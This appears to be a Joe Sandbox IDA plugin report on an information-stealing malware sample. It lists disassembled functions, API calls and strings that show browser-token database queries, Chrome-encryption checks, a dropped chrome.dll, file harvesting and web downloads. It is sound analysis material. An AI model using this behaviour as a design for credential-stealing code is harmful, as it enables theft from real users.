API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
Instruction ID: 57188c1ba08a1133307465c779a7df64e078b16fef0ff91aeefebcb9fd95e905
Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
Instruction Fuzzy Hash: 325174B1A00218ABDB24EF50DC45FEE777DAF44305F0081AAE715A71C0DB74AA85CF95

Function 02405227 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0240523E

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

lstrcat.KERNEL32(?,00000000), ref: 02405267
lstrcat.KERNEL32(?,00420FE8), ref: 02405284

Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404DE3
Part of subcall function 02404DC7: FindFirstFileA.KERNEL32(?,?), ref: 02404DFA

memset.MSVCRT ref: 024052CA
lstrcat.KERNEL32(?,00000000), ref: 024052F3
lstrcat.KERNEL32(?,00421008), ref: 02405310

Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
Part of subcall function 02404DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
Part of subcall function 02404DC7: FindClose.KERNEL32(000000FF), ref: 02405049

memset.MSVCRT ref: 02405356
lstrcat.KERNEL32(?,00000000), ref: 0240537F
lstrcat.KERNEL32(?,00421020), ref: 0240539C

Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404E67
Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 02404E7C
Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404E99
Part of subcall function 02404DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 02404ED5
Part of subcall function 02404DC7: lstrcat.KERNEL32(?,006D6F24), ref: 02404F01
Part of subcall function 02404DC7: lstrcat.KERNEL32(?,00420FE0), ref: 02404F13
Part of subcall function 02404DC7: lstrcat.KERNEL32(?,?), ref: 02404F27
Part of subcall function 02404DC7: lstrcat.KERNEL32(?,00420FE4), ref: 02404F39
Part of subcall function 02404DC7: lstrcat.KERNEL32(?,?), ref: 02404F4D
Part of subcall function 02404DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 02404F63
Part of subcall function 02404DC7: DeleteFileA.KERNEL32(?), ref: 02404FE8

memset.MSVCRT ref: 024053E2

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 4017274736-0
Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
Instruction ID: 1e766ff6461439c27cdaea5311aeeceaf6c38e51c950797cf2baaa17efc280eb
Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
Instruction Fuzzy Hash: 7241D6B5E4032467DB20E770EC8AFDD3339AF20701F804569B689660D0EEB857C88F91

Function 0246F595 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0246F6B4
___TypeMatch.LIBVCRUNTIME ref: 0246F7C2
CatchIt.LIBVCRUNTIME ref: 0246F813
CallUnexpected.LIBVCRUNTIME ref: 0246F92F

Strings

csm, xrefs: 0246F5D2
csm, xrefs: 0246F6EB
csm, xrefs: 0246F63F

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction ID: 2aa8d83de5c2e0ea46d102b8b7b79e8f4126d43e8fcd20067b94a517d77d3f9a
Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction Fuzzy Hash: 44B1AE35800209AFCF14DFA5E848ABFB7B6FF04314B16415BE8966BA11C331D95ACF92

Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
memset.MSVCRT ref: 004173EA
??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: d72bd8021f4414250ebe0f422098046d8e2db5ca649e3467c1f3bf7c9bcf0af0
Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
Opcode Fuzzy Hash: d72bd8021f4414250ebe0f422098046d8e2db5ca649e3467c1f3bf7c9bcf0af0
Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59

Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040BC6F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
lstrlenA.KERNEL32(00000000), ref: 0040BD75
lstrlenA.KERNEL32(00000000), ref: 0040BD89

Strings

AccountId, xrefs: 0040BC94
AccountTokens, xrefs: 0040BA8A
AccountTokens, xrefs: 0040BB19
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBBB

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 47e1307db4a3cf53f5797603b385faac116279239a3b1e4e36c389049f26679a
Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
Opcode Fuzzy Hash: 47e1307db4a3cf53f5797603b385faac116279239a3b1e4e36c389049f26679a
Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A

Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9

Strings

free_result, xrefs: 0040A0C9
connect_to_websocket, xrefs: 0040A0B3
C:\ProgramData\chrome.dll, xrefs: 0040A093

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B

Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
ExitProcess.KERNEL32 ref: 00416A45
ExitProcess.KERNEL32 ref: 00416A4F
ExitProcess.KERNEL32 ref: 00416A59
ExitProcess.KERNEL32 ref: 00416A63
ExitProcess.KERNEL32 ref: 00416A6D

Strings

*, xrefs: 00416A2C

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52

Function 023F7897 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 023F7597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023F7601
Part of subcall function 023F7597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023F7678
Part of subcall function 023F7597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 023F76D4
Part of subcall function 023F7597: GetProcessHeap.KERNEL32(00000000,?), ref: 023F7719
Part of subcall function 023F7597: HeapFree.KERNEL32(00000000), ref: 023F7720

lstrcat.KERNEL32(006D7068,0042192C), ref: 023F78CD
lstrcat.KERNEL32(006D7068,00000000), ref: 023F790F
lstrcat.KERNEL32(006D7068,00421930), ref: 023F7921
lstrcat.KERNEL32(006D7068,00000000), ref: 023F7956
lstrcat.KERNEL32(006D7068,00421934), ref: 023F7967
lstrcat.KERNEL32(006D7068,00000000), ref: 023F799A
lstrcat.KERNEL32(006D7068,00421938), ref: 023F79B4
task.LIBCPMTD ref: 023F79C2

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID:
API String ID: 2677904052-0
Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
Instruction ID: 2b6e933f0ac1acacc88adfab3957868e95bd681815e7369bac3d73380b78fdca
Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
Instruction Fuzzy Hash: DB3145B1E05114DFCB48EBE4EC95DFF777AAB44301F10511AE602672A0EB34AA85CF91

Function 023F5267 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023F5281
RtlAllocateHeap.NTDLL(00000000), ref: 023F5288
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 023F52A1
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 023F52C8
InternetReadFile.WININET(?,?,00000400,00000000), ref: 023F52F8
memcpy.MSVCRT(00000000,?,00000001), ref: 023F5341
InternetCloseHandle.WININET(?), ref: 023F5370
InternetCloseHandle.WININET(?), ref: 023F537D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
Instruction ID: d26c11ad0ded99f67b88f1afaa0a7ff81391e904853ea4e1ad6d131d7f92bbae
Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
Instruction Fuzzy Hash: 6331F8B5E44218ABDB20CF54DC85BDCB7B5AB48304F5081EAF709A7281D7706AC5CF59

Function 024059C7 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 02405AFB
StrCmpCA.SHLWAPI(00000000,004210B8), ref: 02405B58
StrCmpCA.SHLWAPI(00000000,004210C8), ref: 02405D0E

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 024056A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 024056DF

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02405777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024057CF
Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 024057E6
Part of subcall function 02405777: StrStrA.SHLWAPI(00000000,00000000), ref: 0240581B
Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 0240583A
Part of subcall function 02405777: strtok.MSVCRT(00000000,?), ref: 02405855
Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 02405865

StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 02405C42
StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 02405DF7
StrCmpCA.SHLWAPI(00000000,004210D8), ref: 02405EC3
Sleep.KERNEL32(0000EA60), ref: 02405ED2

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID:
API String ID: 3630751533-0
Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
Instruction ID: 73f2372cfa3e30bcb80bfec54f8edc58bc7cf0cb7fa0c6e1458219d32e64d442
Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
Instruction Fuzzy Hash: B5E1FA719002149ACB18FBA1ECD5EEE733BAF54300F90857EE656661D0EF356A88CF91

Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871

Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098

StrCmpCA.SHLWAPI(00000000,00A6DE80), ref: 00410922
StrCmpCA.SHLWAPI(00000000,00A6DDC0), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,00A6DDD0), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Strings

C:\ProgramData\chrome.dll, xrefs: 00410C30
C:\ProgramData\chrome.dll, xrefs: 004108CD

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CreateDeleteLibraryLoad
String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
API String ID: 585553867-663540502
Opcode ID: 6fa52e141afa07bae2f7f81fa1d001bb92de8cedc841732e46451214a9d8632a
Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
Opcode Fuzzy Hash: 6fa52e141afa07bae2f7f81fa1d001bb92de8cedc841732e46451214a9d8632a
Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A

Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
memset.MSVCRT ref: 0040A60B
LocalAlloc.KERNEL32(00000040,?), ref: 0040A664

Strings

@, xrefs: 0040A614
v20, xrefs: 0040A571
v10, xrefs: 0040A5C6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @$v10$v20
API String ID: 631489823-278772428
Opcode ID: 954d5cad7f580f9cd40c0088cb8a78c697fd415e6e8ad607050bfdcf02893cf8
Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
Opcode Fuzzy Hash: 954d5cad7f580f9cd40c0088cb8a78c697fd415e6e8ad607050bfdcf02893cf8
Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A

Function 023F1577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 023F158E

Part of subcall function 023F1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F151B
Part of subcall function 023F1507: RtlAllocateHeap.NTDLL(00000000), ref: 023F1522
Part of subcall function 023F1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023F153E
Part of subcall function 023F1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023F155C
Part of subcall function 023F1507: RegCloseKey.ADVAPI32(?), ref: 023F1566

lstrcat.KERNEL32(?,00000000), ref: 023F15B6
lstrlen.KERNEL32(?), ref: 023F15C3
lstrcat.KERNEL32(?,00426414), ref: 023F15DE

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

CopyFileA.KERNEL32(?,00000000,00000001), ref: 023F16CC

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451

DeleteFileA.KERNEL32(00000000), ref: 023F1756
memset.MSVCRT ref: 023F177D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID:
API String ID: 3885987321-0
Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
Instruction ID: 984b41df9d532820a14bb422d80e62ddb641bff0167b179b61cfd67b8607e93c
Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
Instruction Fuzzy Hash: 68512CB1D402289BCB25FB60DD94EED733AAF54701F4045AEA74A620D1EE305BC8CF95

Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00A70B98,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00414A51
lstrcatA.KERNEL32(?,?), ref: 00414A70
lstrcatA.KERNEL32(?,?), ref: 00414A84
lstrcatA.KERNEL32(?,00A699A8), ref: 00414A97
lstrcatA.KERNEL32(?,?), ref: 00414AAB
lstrcatA.KERNEL32(?,00A71630), ref: 00414ABF

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: b50baa58c06f86b24b53a457bfc21054e7bd1439383fcb662da6fefd690fe49e
Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
Opcode Fuzzy Hash: b50baa58c06f86b24b53a457bfc21054e7bd1439383fcb662da6fefd690fe49e
Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99

Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

